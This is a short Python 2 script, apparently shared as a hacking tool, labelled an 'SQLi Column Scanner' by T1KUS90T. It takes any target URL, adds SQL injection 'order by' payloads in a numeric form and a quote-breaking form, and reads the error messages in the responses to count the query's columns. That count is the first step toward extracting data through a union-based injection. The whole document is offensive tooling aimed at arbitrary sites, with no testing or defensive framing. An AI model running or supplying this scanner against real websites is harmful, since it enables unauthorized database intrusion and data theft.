T1KUS90T SQLi Column Scanner

1. #! /usr/bin/python
2.  
3. import urllib
4. import sys
5.  
6. print '''
7. --------------------------------
8. .d8888b.  .d88888b. 888     d8b
9. d88P  Y88bd88P" "Y88b888     Y8P
10. Y88b.     888     888888        
11. "Y888b.  888     888888     888
12.    "Y88b.888     888888     888
13.      "888888 Y8b 888888     888
14. Y88b  d88PY88b.Y8b88P888     888
15. "Y8888P"  "Y888888" 88888888888
16.                 Y8b
17.  
18.   Column Scanner by T1KUS90T
19. -------------------------------- '''
20.  
21. target = raw_input("[+] Input target: ")
22. if not target.startswith("http://"):
23.     target = "http://"+target
24.  
25. pay = raw_input("[+] Payload (1,2): ")
26.  
27. #Read Unknown
28. if pay == "1":
29.     col_max = input("\n[?] Max column [guess it]: ")
30.     for i in range(1,col_max+1):
31.         payload = "+order+by+%s--+- \n" %(i)
32.         site = target+payload
33.         o = urllib.urlopen(site).read()
34.         error = "Unknown"
35.         if error in o:
36.             print "[+] Error in : ",i-1+1
37.             print "[+] Total columns : ",i-1
38.             sys.exit()
39.         else:
40.             continue
41.  
42. #Read Warning``
43. if pay == "2":
44.     col_max = input("\n[?] Max column [guess it]: ")
45.     for i in range(1,col_max+1):
46.         payload = "'+order+by+%s--+- \n" %(i)
47.         site = target+payload
48.         o = urllib.urlopen(site).read()
49.         error = "Warning"
50.         if error in o:
51.             print "[+] Error in: ",i-1+1
52.             print "[+] Total columns: ",i-1
53.             sys.exit()
54.         else:
55.             continue